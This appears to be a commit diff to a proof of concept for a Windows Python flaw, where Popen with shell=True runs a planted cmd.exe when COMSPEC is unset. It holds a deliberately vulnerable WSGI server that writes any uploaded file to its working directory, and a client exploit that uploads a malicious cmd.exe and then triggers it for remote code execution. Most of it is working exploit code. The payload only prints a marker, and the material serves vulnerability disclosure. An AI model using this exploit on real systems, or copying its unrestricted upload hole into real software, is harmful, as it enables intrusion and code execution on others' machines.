POC

Author: mauricelambert

POC.png

@@ -7,11 +7,13 @@ the executable launched is `cmd.exe` and the full path is not defined.
 It's possible to launch a malicious `cmd.exe` file from working directory
 or any any path before the `C:\Windows\system32` directory in the `PATH`.
 
+I write a simple POC, a vulnerable HTTP server to upload files.
+
 ## Requirements
 
- - Windows machine without `COMSPEC`
- - Use `subprocess.Popen` or any `subprocess` function that use `subprocess.Popen` with `shell=True`
- - Possible upload in working directory or any path before the `C:\Windows\system32` directory in the `PATH`
+ - Windows machine without `COMSPEC` environment variable
+ - Use `subprocess.Popen` or any `subprocess` functions that use `subprocess.Popen` with `shell=True`
+ - The attacker may upload file in the working directory or any directory before the `C:\Windows\system32` directory in the `PATH`
 
 ## Patch
 
@@ -27,13 +29,21 @@ int main() {printf("H4CK3D - EXPLOIT IS WORKING\n");return 0;}
 # gcc -o not_cmd.exe RCE_program.c
 ```
 
+Compile with `gcc -o not_cmd.exe RCE_program.c` command.
+
 ### Python HTTP client
 
 ```python
 from urllib.request import Request, urlopen
+from time import strftime, localtime, sleep
 
+print("[*]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Simple GET request to see the default behaviour...")
 get_response = urlopen("http://127.0.0.1:8000/")
-post_response = urlopen(Request("http://127.0.0.1:8000/cmd.exe", data=open('not_cmd.exe', 'rb').read())) # upload a malicious cmd.exe file
+sleep(2)
+print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Start exploit with upload a malicious cmd.exe file...")
+post_response = urlopen(Request("http://127.0.0.1:8000/cmd.exe", data=open('not_cmd.exe', 'rb').read())) # write a cmd.exe file
+sleep(2)
+print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "RCE with malicious cmd.exe file...")
 exploit_response = urlopen("http://127.0.0.1:8000/")                                                     # RCE -> cmd.exe file is executed instead of C:\WINDOWS\system32\cmd.exe
 ```
 
@@ -50,18 +60,22 @@ del environ['COMSPEC']  # force environment without COMSPEC
 
 def app(environ, start_response):
     method = environ["REQUEST_METHOD"]
+    print('[*] New request, method:', method)
     if method == "GET":
         process = Popen("myprogram", shell=True, stderr=DEVNULL)
         process.communicate()
+        print('[+] Process exit code:', process.returncode)
         status = "200 OK"
         content = b"GET OK"
     elif method == "POST":
         status = "200 OK"
         content = b"File uploaded successfully."
         content_length = environ.get("CONTENT_LENGTH", "0")
         if content_length.isdigit():
-            with open(basename(environ["PATH_INFO"]), 'wb') as file:
+            filename = basename(environ["PATH_INFO"])
+            with open(filename, 'wb') as file:
                 file.write(environ["wsgi.input"].read(int(content_length)))
+            print('[+] New file written:', filename)
         else:
             status = "400 Bad Request"
             content = b'Invalid Content-Length header.'
@@ -72,5 +86,6 @@ def app(environ, start_response):
     return (content,)
 
 with make_server('127.0.0.1', 8000, app) as httpd:
+    print('[*] Serving HTTP on 127.0.0.1 port 8000 (http://127.0.0.1:8000/) ...')
     httpd.serve_forever()
 ```

README.md

@@ -1,5 +1,11 @@
 from urllib.request import Request, urlopen
+from time import strftime, localtime, sleep
 
+print("[*]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Simple GET request to see the default behaviour...")
 get_response = urlopen("http://127.0.0.1:8000/")
+sleep(2)
+print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "Start exploit with upload a malicious cmd.exe file...")
 post_response = urlopen(Request("http://127.0.0.1:8000/cmd.exe", data=open('not_cmd.exe', 'rb').read())) # write a cmd.exe file
+sleep(2)
+print("[+]", strftime("%Y-%m-%d %H:%M:%S", localtime()), "RCE with malicious cmd.exe file...")
 exploit_response = urlopen("http://127.0.0.1:8000/")                                                     # RCE -> cmd.exe file is executed instead of C:\WINDOWS\system32\cmd.exe

client_exploit.py

@@ -8,18 +8,22 @@
 
 def app(environ, start_response):
     method = environ["REQUEST_METHOD"]
+    print('[*] New request, method:', method)
     if method == "GET":
         process = Popen("myprogram", shell=True, stderr=DEVNULL)
         process.communicate()
+        print('[+] Process exit code:', process.returncode)
         status = "200 OK"
         content = b"GET OK"
     elif method == "POST":
         status = "200 OK"
         content = b"File uploaded successfully."
         content_length = environ.get("CONTENT_LENGTH", "0")
         if content_length.isdigit():
-            with open(basename(environ["PATH_INFO"]), 'wb') as file:
+            filename = basename(environ["PATH_INFO"])
+            with open(filename, 'wb') as file:
                 file.write(environ["wsgi.input"].read(int(content_length)))
+            print('[+] New file written:', filename)
         else:
             status = "400 Bad Request"
             content = b'Invalid Content-Length header.'
@@ -30,4 +34,5 @@ def app(environ, start_response):
     return (content,)
 
 with make_server('127.0.0.1', 8000, app) as httpd:
+    print('[*] Serving HTTP on 127.0.0.1 port 8000 (http://127.0.0.1:8000/) ...')
     httpd.serve_forever()